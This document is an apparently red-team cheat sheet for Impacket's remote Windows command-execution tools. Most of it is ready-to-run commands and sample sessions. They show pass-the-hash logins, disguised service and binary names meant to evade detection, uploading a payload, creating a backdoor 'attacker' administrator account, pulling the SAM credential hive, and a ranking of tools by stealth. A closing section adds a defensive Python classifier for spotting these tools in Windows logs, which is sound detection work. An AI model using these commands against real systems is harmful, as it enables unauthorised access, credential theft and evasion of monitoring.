Impacket provides multiple methods for executing commands on remote Windows systems, each using different protocols and execution contexts.
| Tool | Protocol | Context | Stealth | Requirements |
| --- | --- | --- | --- | --- |
| psexec.py | SMB + RemComSvc | SYSTEM | Low | Admin, SMB access |
| smbexec.py | SMB + Service | SYSTEM | Low | Admin, SMB access |
| wmiexec.py | WMI/DCOM | User | Medium | Admin, DCOM ports |
| dcomexec.py | DCOM Objects | User | Medium | Admin, DCOM ports |
| atexec.py | Task Scheduler | SYSTEM | Medium | Admin, Task Scheduler |
psexec.py
PsExec-like functionality using RemComSvc: uploads the RemComSvc binary to a writable share, registers and starts it as a temporary service, and executes commands as SYSTEM through it.
Basic Usage
Interactive Shell
# Password authentication
psexec.py DOMAIN/username:password@target
# Pass-the-hash
psexec.py DOMAIN/username@target -hashes :NTHASH
# Kerberos authentication
psexec.py DOMAIN/username@target -k -no-pass -dc-ip DC_IP
Single Command
# Execute single command
psexec.py DOMAIN/user:pass@target "whoami"
psexec.py DOMAIN/user:pass@target "ipconfig /all"
# Run PowerShell
psexec.py DOMAIN/user@target -hashes :HASH "powershell -c Get-Process"
File Upload & Execute
# Copy and execute a file
psexec.py DOMAIN/user:pass@target -copy-file /path/to/file.exe
# Specify custom service name
psexec.py DOMAIN/user:pass@target -service-name CustomSvc
Advanced Options
Custom Service Configuration
# Custom service name (avoid detection)
psexec.py domain/user@target -service-name WinDefendSvc
# Custom remote binary name
psexec.py domain/user@target -remote-binary-name svchost.exe
# Upload and execute binary
psexec.py domain/user@target -copy-file payload.exe
# Execute with arguments
psexec.py domain/user@target -copy-file tool.exe "arg1 arg2"
# Custom SMB port
psexec.py domain/user@target -port 8445
# Target IP (when DNS fails)
psexec.py domain/user@hostname -target-ip 10.0.0.5
Example Output
$ psexec.py CORP/admin:password@10.0.0.50
Impacket v0.12.0 - Copyright 2023 Fortra
[*] Requesting shares on 10.0.0.50.....
[*] Found writable share ADMIN$
[*] Uploading file HjKDpnmR.exe
[*] Opening SVCManager on 10.0.0.50.....
[*] Creating service RemComSvc on 10.0.0.50.....
[*] Starting service RemComSvc.....
[!] Press help for extra shell commands
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>hostname
WIN-SERVER01
smbexec.py
Executes commands through a temporary service whose command line is the command itself, so no binary is uploaded; output is written to a share on the target and read back. In server mode, smbexec.py hosts a local SMB server so the target does not need a writable share.
Basic Usage
Share Mode
# Use existing writable share
smbexec.py DOMAIN/user:pass@target -share C$
smbexec.py DOMAIN/user@target -hashes :HASH -share ADMIN$
# Auto-detect writable share
smbexec.py DOMAIN/user:pass@target
Server Mode
# Launch local SMB server (requires root for port 445)
sudo smbexec.py DOMAIN/user:pass@target -mode server
# With custom service name
sudo smbexec.py DOMAIN/user@target -hashes :HASH -mode server -service-name svc
Shell Types
# CMD shell (default)
smbexec.py domain/user:pass@target
# PowerShell
smbexec.py domain/user:pass@target -shell-type powershell
Characteristics
Advantages
No binary upload required
Works with any writable share
Server mode for restricted environments
Disadvantages
Generates event logs (service creation)
Commands timeout if they run too long
Not fully interactive
Example
$ smbexec.py CORP/admin@10.0.0.50 -hashes :8846f7eaee8fb117ad06bdd830b7586c
Impacket v0.12.0 - Copyright 2023 Fortra
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>net user attacker P@ssw0rd! /add
The command completed successfully.
C:\Windows\system32>net localgroup administrators attacker /add
The command completed successfully.
wmiexec.py
Executes commands through WMI over DCOM. Runs as the authenticated user (not SYSTEM) and creates no service, so it leaves less event log noise than the service-based tools.
Basic Usage
Interactive Shell
# Standard authentication
wmiexec.py DOMAIN/user:password@target
# Pass-the-hash
wmiexec.py DOMAIN/user@target -hashes LMHASH:NTHASH
# Kerberos
wmiexec.py DOMAIN/user@target -k -no-pass
Single Command
# Execute command and exit
wmiexec.py DOMAIN/user:pass@target "hostname"
wmiexec.py DOMAIN/user@target -hashes :HASH "ipconfig"
No Output Mode
# Execute without retrieving output (stealth)
wmiexec.py DOMAIN/user:pass@target -nooutput "command"
Advanced Features
# CMD shell (default)
wmiexec.py domain/user:pass@target
# PowerShell shell
wmiexec.py domain/user:pass@target -shell-type powershell
# Execute single PowerShell command
wmiexec.py domain/user:pass@target -shell-type powershell "Get-Process"
# Use specific share for output
wmiexec.py domain/user:pass@target -share C$
wmiexec.py domain/user:pass@target -share ADMIN$
# Upload file
C:\>lput /local/file.txt C:\Windows\Temp\file.txt
# Download file
C:\>lget C:\Windows\System32\config\SAM
# Change local directory
C:\>lcd /tmp
Example Session
$ wmiexec.py CORP/admin:P@ssw0rd@10.0.0.50
Impacket v0.12.0 - Copyright 2023 Fortra
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
corp\admin
C:\>powershell -c "Get-WmiObject Win32_OperatingSystem | Select Caption"
Caption
-------
Microsoft Windows Server 2019 Standard
dcomexec.py
Executes commands by invoking DCOM objects that expose a command-execution method. Several objects are supported because which one is available depends on the Windows version.
MMC20.Application
# Default method (Windows 7/10/Server 2012R2+)
dcomexec.py DOMAIN/user:pass@target
dcomexec.py DOMAIN/user:pass@target -object MMC20
ShellWindows
# Alternative method
dcomexec.py DOMAIN/user:pass@target -object ShellWindows
ShellBrowserWindow
# Windows 10/Server 2012R2
dcomexec.py DOMAIN/user:pass@target -object ShellBrowserWindow
Usage Examples
# Interactive shell with MMC20
dcomexec.py CORP/admin@10.0.0.50 -hashes :NTHASH
# Single command execution
dcomexec.py CORP/admin:pass@target -object ShellWindows "whoami"
# PowerShell shell
dcomexec.py CORP/admin@target -hashes :HASH -shell-type powershell
# No output mode
dcomexec.py CORP/admin:pass@target -nooutput "command"
atexec.py
Executes commands via Task Scheduler. Runs as SYSTEM with less noise than service-based methods.
Basic Usage
Standard Execution
# Execute command and retrieve output
atexec.py DOMAIN/user:password@target "whoami"
atexec.py DOMAIN/user@target -hashes :HASH "ipconfig /all"
Kerberos
# Kerberos authentication
atexec.py DOMAIN/user@target -k -no-pass "hostname"
atexec.py DOMAIN/user:pass@target -k -dc-ip 10.0.0.1 "whoami"
Interactive Session
# Execute PowerShell session (experimental)
atexec.py domain/user:pass@target -session-id 1 "powershell"
Example
$ atexec.py CORP/admin:P@ssw0rd@10.0.0.50 "whoami"
Impacket v0.12.0 - Copyright 2023 Fortra
[!] This will work ONLY on Windows >= Vista
[*] Creating task \hKtMjRxL
[*] Running task \hKtMjRxL
[*] Deleting task \hKtMjRxL
[*] Attempting to read ADMIN$\Temp\hKtMjRxL.tmp
nt authority\system
Stealth Priority
Most Stealthy to Least:
wmiexec.py - Minimal event logs, runs as user
dcomexec.py - DCOM-based, less common detection
atexec.py - Task Scheduler, moderate logging
smbexec.py - Service creation logs
psexec.py - Service creation + binary upload
Reliability
Most Reliable to Least:
psexec.py - Time-tested, most compatible
wmiexec.py - Very reliable, requires DCOM
smbexec.py - Reliable, some edge cases
atexec.py - Generally reliable, Vista+
dcomexec.py - Version-dependent DCOM objects
Environment
When to Use Each:
psexec.py : Need SYSTEM, full compatibility
wmiexec.py : DCOM available, prefer stealth
smbexec.py : No writable shares, use server mode
atexec.py : Task Scheduler available, need SYSTEM
dcomexec.py : Alternative when others fail
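As an added detection example (not part of the Impacket documentation), the following Python classifies normalized Windows log events by the host artifacts the stealth ranking above refers to: service installs (System event 7045) named RemComSvc or pointing at a random eight-letter binary, service installs whose image path is a shell command rather than a binary, scheduled tasks (Security event 4698) with a random eight-letter name, and WMI-spawned processes (Sysmon event 1, parent WmiPrvSE.exe) that redirect output to an administrative share. The event dicts are constructed samples, and the key names are an assumption about how a SIEM would normalize these fields.

```python
import re
from typing import Optional

# Default psexec binary and atexec task names are eight random letters (see the example sessions)
RANDOM_NAME = re.compile(r"^[A-Za-z]{8}$")
# UNC path into an administrative share, e.g. \\127.0.0.1\ADMIN$\__output
ADMIN_SHARE = re.compile(r"\\\\[^\\]+\\(ADMIN|C)\$\\", re.IGNORECASE)

# Constructed sample events (not real telemetry); key names are assumed SIEM field names
SAMPLE_EVENTS = [
    {"id": 7045, "service": "RemComSvc", "image": r"%SystemRoot%\HjKDpnmR.exe"},
    {"id": 7045, "service": "svc",  # constructed smbexec-style image path: a shell command, no binary
     "image": r"%COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\__output 2^>&1 > %TEMP%\execute.bat"},
    {"id": 7045, "service": "Spooler", "image": r"C:\Windows\System32\spoolsv.exe"},
    {"id": 4698, "task": r"\hKtMjRxL"},
    {"id": 4698, "task": r"\Microsoft\Windows\Defrag\ScheduledDefrag"},
    {"id": 1, "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1700000000.12 2>&1"},
    {"id": 1, "parent": r"C:\Windows\explorer.exe", "cmdline": "notepad.exe"},
]


def classify(event: dict) -> Optional[str]:
    """Return a finding label for one normalized event, or None if nothing matched."""
    eid = event.get("id")
    if eid == 7045:  # System log: a new service was installed
        image = event["image"]
        binary = image.split("\\")[-1].split(".")[0]  # file name without extension
        if event["service"] == "RemComSvc" or RANDOM_NAME.match(binary):
            return "psexec-like service install"
        if "%COMSPEC%" in image.upper() or "CMD.EXE" in image.upper():
            return "smbexec-like command service"  # the service runs a shell instead of a binary
    elif eid == 4698:  # Security log: a scheduled task was created
        if RANDOM_NAME.match(event["task"].lstrip("\\")):
            return "atexec-like scheduled task"
    elif eid == 1:  # Sysmon: process creation
        parent = event["parent"].split("\\")[-1].lower()
        if parent == "wmiprvse.exe" and ADMIN_SHARE.search(event["cmdline"]):
            return "wmiexec-like WMI process writing output to a share"
    return None


def scan(events) -> list:
    """Run classify over a batch and keep only the events that produced a finding."""
    return [(e["id"], label) for e in events if (label := classify(e)) is not None]


if __name__ == "__main__":
    for eid, label in scan(SAMPLE_EVENTS):
        print(f"event {eid}: {label}")
```

Custom names passed with -service-name or -remote-binary-name defeat the name-based checks, which is why the shell-command and share-output rules do not depend on names.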
Common Issues
# Verify credentials work
crackmapexec smb target -u user -p password
# Check if user is local admin
crackmapexec smb target -u user -p password --local-auth
# Try different authentication method
tool.py domain/user@target -hashes :NTHASH
Connection Refused / Firewall
# Test SMB connectivity (445)
nc -zv target 445
# Test RPC endpoint mapper and SMB (135, 445); DCOM also needs the dynamic range 49152-65535
nmap -p 135,445 target
# Use specific target IP
tool.py domain/user@hostname -target-ip 10.0.0.5